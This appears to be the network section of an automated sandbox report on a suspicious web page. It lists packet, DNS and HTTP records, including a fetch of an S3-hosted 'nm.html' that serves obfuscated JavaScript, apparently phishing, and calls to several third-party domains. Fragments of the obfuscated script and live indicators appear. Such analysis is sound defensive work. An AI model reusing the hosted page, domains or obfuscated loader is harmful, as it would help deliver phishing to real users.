                                    Jan 23, 2025 08:06:06.029232025 CET61492443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:06.071377039 CET4436149240.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:06.258713007 CET4436149240.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:06.258908033 CET4436149240.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:06.259179115 CET61492443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:06.259196043 CET4436149240.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:06.259221077 CET61492443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:06.895391941 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:06.895435095 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:06.895505905 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:06.895790100 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:06.895806074 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:08.766148090 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:08.766649961 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:08.766671896 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:08.767827034 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:08.768138885 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:08.768207073 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:08.768282890 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:08.811362028 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:13.153762102 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:13.153879881 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:13.153944016 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:13.154395103 CET61506443192.168.2.6184.168.29.58
                                    Jan 23, 2025 08:06:13.154428959 CET44361506184.168.29.58192.168.2.6
                                    Jan 23, 2025 08:06:27.613033056 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:27.613142967 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:27.613285065 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:27.613488913 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:27.613519907 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:28.309000015 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:28.309457064 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:28.309480906 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:28.309828997 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:28.310292959 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:28.310354948 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:28.361907959 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:28.700783968 CET5691253192.168.2.61.1.1.1
                                    Jan 23, 2025 08:06:28.705682039 CET53569121.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:28.705758095 CET5691253192.168.2.61.1.1.1
                                    Jan 23, 2025 08:06:28.706033945 CET5691253192.168.2.61.1.1.1
                                    Jan 23, 2025 08:06:28.710855961 CET53569121.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:29.243247032 CET53569121.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:29.243621111 CET5691253192.168.2.61.1.1.1
                                    Jan 23, 2025 08:06:29.248665094 CET53569121.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:29.248744965 CET5691253192.168.2.61.1.1.1
                                    Jan 23, 2025 08:06:30.716640949 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:30.716691017 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:30.716761112 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:30.717592955 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:30.717608929 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.541049004 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.541161060 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.543392897 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.543401957 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.544162989 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.545998096 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.546045065 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.546144009 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.546152115 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.587343931 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.738711119 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.738933086 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:31.738993883 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.739259958 CET56914443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:06:31.739288092 CET4435691440.113.103.199192.168.2.6
                                    Jan 23, 2025 08:06:38.213152885 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:38.213233948 CET44361551142.250.184.228192.168.2.6
                                    Jan 23, 2025 08:06:38.213424921 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:39.473982096 CET61551443192.168.2.6142.250.184.228
                                    Jan 23, 2025 08:06:39.474055052 CET44361551142.250.184.228192.168.2.6
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 23, 2025 08:05:24.766347885 CET53653151.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:24.801599026 CET53611581.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:25.905740976 CET53593541.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:27.550106049 CET5564153192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:27.550304890 CET5063553192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:27.557111025 CET53556411.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:27.557424068 CET53506351.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:31.650388956 CET5594953192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:31.650576115 CET5820253192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:31.661664963 CET53559491.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:31.665445089 CET53582021.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:32.952306986 CET6363653192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:32.952527046 CET6351053192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:32.957700968 CET53629131.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:32.959192991 CET53635101.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:32.959240913 CET53636361.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:33.642832994 CET6043353192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:33.643033028 CET6096553192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:33.653640985 CET53604331.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:33.670222044 CET53609651.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:34.073156118 CET6099853192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:34.073295116 CET5283353192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:34.080338955 CET53609981.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:34.100739002 CET53528331.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:34.115428925 CET53646691.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:34.334991932 CET6452153192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:34.334992886 CET6389553192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:34.348285913 CET53645211.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:34.348325968 CET53638951.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:35.546689987 CET5638853192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:35.546814919 CET5666753192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:35.555078030 CET53563881.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:35.588776112 CET53566671.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:42.994822025 CET53514461.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:47.074320078 CET5666053192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:47.074506044 CET5042353192.168.2.61.1.1.1
                                    Jan 23, 2025 08:05:47.379929066 CET53504231.1.1.1192.168.2.6
                                    Jan 23, 2025 08:05:47.380335093 CET53566601.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:02.041384935 CET53572451.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:04.603527069 CET5350158162.159.36.2192.168.2.6
                                    Jan 23, 2025 08:06:05.336868048 CET53516931.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:24.075290918 CET53503101.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:24.651346922 CET53602841.1.1.1192.168.2.6
                                    Jan 23, 2025 08:06:28.696787119 CET53562971.1.1.1192.168.2.6
                                    TimestampSource IPDest IPChecksumCodeType
                                    Jan 23, 2025 08:05:33.670386076 CET192.168.2.61.1.1.1c231(Port unreachable)Destination Unreachable
                                    Jan 23, 2025 08:05:35.588875055 CET192.168.2.61.1.1.1c266(Port unreachable)Destination Unreachable

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 23, 2025 08:05:27.550106049 CET192.168.2.61.1.1.10x2908Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:27.550304890 CET192.168.2.61.1.1.10x5434Standard query (0)www.google.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:31.650388956 CET192.168.2.61.1.1.10xb5d8Standard query (0)exy77.s3.eu-central-1.amazonaws.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.650576115 CET192.168.2.61.1.1.10x5632Standard query (0)exy77.s3.eu-central-1.amazonaws.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:32.952306986 CET192.168.2.61.1.1.10x5e33Standard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:32.952527046 CET192.168.2.61.1.1.10xcb7fStandard query (0)kit.fontawesome.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:33.642832994 CET192.168.2.61.1.1.10x8e52Standard query (0)electjimhenderson.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:33.643033028 CET192.168.2.61.1.1.10x13daStandard query (0)electjimhenderson.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:34.073156118 CET192.168.2.61.1.1.10x1c68Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.073295116 CET192.168.2.61.1.1.10xb0eStandard query (0)logo.clearbit.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:34.334991932 CET192.168.2.61.1.1.10x5b8fStandard query (0)electjimhenderson.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.334992886 CET192.168.2.61.1.1.10x95faStandard query (0)electjimhenderson.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:35.546689987 CET192.168.2.61.1.1.10x677aStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.546814919 CET192.168.2.61.1.1.10xb229Standard query (0)logo.clearbit.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:47.074320078 CET192.168.2.61.1.1.10xb94dStandard query (0)txlocksmithbellaire.comA (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:47.074506044 CET192.168.2.61.1.1.10xb935Standard query (0)txlocksmithbellaire.com65IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 23, 2025 08:05:27.557111025 CET1.1.1.1192.168.2.60x2908No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:27.557424068 CET1.1.1.1192.168.2.60x5434No error (0)www.google.com65IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)exy77.s3.eu-central-1.amazonaws.coms3-r-w.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.138.248A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.171.174A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.134.210A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.137.200A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.170.206A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.138.51A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.183A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.661664963 CET1.1.1.1192.168.2.60xb5d8No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.12A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:31.665445089 CET1.1.1.1192.168.2.60x5632No error (0)exy77.s3.eu-central-1.amazonaws.coms3-r-w.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:32.959192991 CET1.1.1.1192.168.2.60xcb7fNo error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:32.959240913 CET1.1.1.1192.168.2.60x5e33No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:32.959240913 CET1.1.1.1192.168.2.60x5e33No error (0)kit.fontawesome.com.cdn.cloudflare.net104.18.40.68A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:32.959240913 CET1.1.1.1192.168.2.60x5e33No error (0)kit.fontawesome.com.cdn.cloudflare.net172.64.147.188A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:33.653640985 CET1.1.1.1192.168.2.60x8e52No error (0)electjimhenderson.com76.223.67.189A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:33.653640985 CET1.1.1.1192.168.2.60x8e52No error (0)electjimhenderson.com13.248.213.45A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.080338955 CET1.1.1.1192.168.2.60x1c68No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.080338955 CET1.1.1.1192.168.2.60x1c68No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.080338955 CET1.1.1.1192.168.2.60x1c68No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.080338955 CET1.1.1.1192.168.2.60x1c68No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.080338955 CET1.1.1.1192.168.2.60x1c68No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.100739002 CET1.1.1.1192.168.2.60xb0eNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.348285913 CET1.1.1.1192.168.2.60x5b8fNo error (0)electjimhenderson.com76.223.67.189A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:34.348285913 CET1.1.1.1192.168.2.60x5b8fNo error (0)electjimhenderson.com13.248.213.45A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.555078030 CET1.1.1.1192.168.2.60x677aNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.555078030 CET1.1.1.1192.168.2.60x677aNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.555078030 CET1.1.1.1192.168.2.60x677aNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.555078030 CET1.1.1.1192.168.2.60x677aNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.555078030 CET1.1.1.1192.168.2.60x677aNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                    Jan 23, 2025 08:05:35.588776112 CET1.1.1.1192.168.2.60xb229No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 23, 2025 08:05:47.380335093 CET1.1.1.1192.168.2.60xb94dNo error (0)txlocksmithbellaire.com184.168.29.58A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • exy77.s3.eu-central-1.amazonaws.com
                                    • https:
                                      • kit.fontawesome.com
                                      • electjimhenderson.com
                                      • logo.clearbit.com
                                      • txlocksmithbellaire.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination Port
                                    0192.168.2.66486840.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 68 30 38 54 73 33 77 4a 55 47 41 41 6b 67 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 65 62 37 63 30 63 31 62 63 33 61 36 39 66 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: th08Ts3wJUGAAkgN.1Context: 6ceb7c0c1bc3a69f
                                    2025-01-23 07:05:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:05:26 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 68 30 38 54 73 33 77 4a 55 47 41 41 6b 67 4e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 65 62 37 63 30 63 31 62 63 33 61 36 39 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 53 76 41 73 43 6f 6e 6a 51 46 55 32 55 57 36 38 33 33 6b 67 64 55 75 77 50 37 74 41 66 49 41 41 4b 4d 73 78 6d 63 49 58 57 69 64 7a 36 4a 39 34 64 6f 33 41 31 2f 67 65 67 6f 6b 34 5a 46 4c 65 37 42 36 35 62 4f 2b 7a 2f 61 36 74 43 37 55 59 53 6d 72 4f 4f 70 6a 42 37 61 43 77 4d 49 58 72 38 50 70 63 78 65 6b 65 51 2f 56 58
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: th08Ts3wJUGAAkgN.2Context: 6ceb7c0c1bc3a69f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:05:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 74 68 30 38 54 73 33 77 4a 55 47 41 41 6b 67 4e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 65 62 37 63 30 63 31 62 63 33 61 36 39 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: th08Ts3wJUGAAkgN.3Context: 6ceb7c0c1bc3a69f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:05:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:05:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 42 41 32 76 57 50 4d 65 30 4b 49 2b 2f 55 37 35 31 6f 51 4d 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: tBA2vWPMe0KI+/U751oQMg.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.6648843.5.138.2484433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:32 UTC671OUTGET /nm.html HTTP/1.1
                                    Host: exy77.s3.eu-central-1.amazonaws.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:32 UTC447INHTTP/1.1 200 OK
                                    x-amz-id-2: m+GVjeCgWz9hqtPfcSJL9marpQl/oh5z6s4uURNRz6+Sp7e7VewCONsWUCEXfhsgSSv+2b1C1A+hfEXkD4stm6ZNI3G2MNTnvX8I0eqUq5Q=
                                    x-amz-request-id: WVDZ4GNACTTFZEBB
                                    Date: Thu, 23 Jan 2025 07:05:33 GMT
                                    Last-Modified: Thu, 23 Jan 2025 04:28:18 GMT
                                    ETag: "e7c43ac0588df167770df7b356af19bf"
                                    x-amz-server-side-encryption: AES256
                                    Accept-Ranges: bytes
                                    Content-Type: text/html
                                    Content-Length: 77786
                                    Server: AmazonS3
                                    Connection: close
                                    2025-01-23 07:05:32 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 2f 2f 20 3d 3d 20 43 6f 64 65 20 4f 62 66 75 73 63 61 74 69 6f 6e 20 50 72 6f 74 65 63 74 69 6f 6e 20 66 72 6f 6d 20 68 74 74 70 73 3a 2f 2f 62 6c 61 63 6b 68 61 63 6b 65 72 74 6f 6f 6c 73 2e 63 6f 6d 20 3d 3d 20 2f 2f 0d 0a 76 61 72 20 5f 30 78 31 65 64 32 65 31 3d 5f 30 78 32 65 65 32 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 65 65 32 28 5f 30 78 39 63 39 39 34 32 2c 5f 30 78 34 38 62 63 30 31 29 7b 76 61 72 20 5f 30 78 33 62 61 32 38 66 3d 5f 30 78 63 32 30 35 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 65 65 32 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 61 64 66 31 38 2c 5f 30 78 31 30 39 61 39 36 29 7b 5f 30 78 35 61 64 66 31 38 3d 5f 30 78
                                    Data Ascii: <script language="javascript">...// == Code Obfuscation Protection from https://blackhackertools.com == //var _0x1ed2e1=_0x2ee2;function _0x2ee2(_0x9c9942,_0x48bc01){var _0x3ba28f=_0xc205();return _0x2ee2=function(_0x5adf18,_0x109a96){_0x5adf18=_0x
                                    2025-01-23 07:05:32 UTC577INData Raw: 30 78 31 65 64 32 65 31 28 30 78 36 32 66 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 35 37 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 33 37 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 65 61 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 61 38 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 63 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 35 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 65 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 63 30 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 38 30 33 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 35 62 62 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 32 30 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 66 37 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 62 34 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 66 36 29 2b 5f 30 78
                                    Data Ascii: 0x1ed2e1(0x62f)+_0x1ed2e1(0x757)+_0x1ed2e1(0x737)+_0x1ed2e1(0xea)+_0x1ed2e1(0x7a8)+_0x1ed2e1(0xce)+_0x1ed2e1(0x451)+_0x1ed2e1(0x1ec)+_0x1ed2e1(0x4c0)+_0x1ed2e1(0x803)+_0x1ed2e1(0x5bb)+_0x1ed2e1(0x120)+_0x1ed2e1(0x3f7)+_0x1ed2e1(0x7b4)+_0x1ed2e1(0x6f6)+_0x
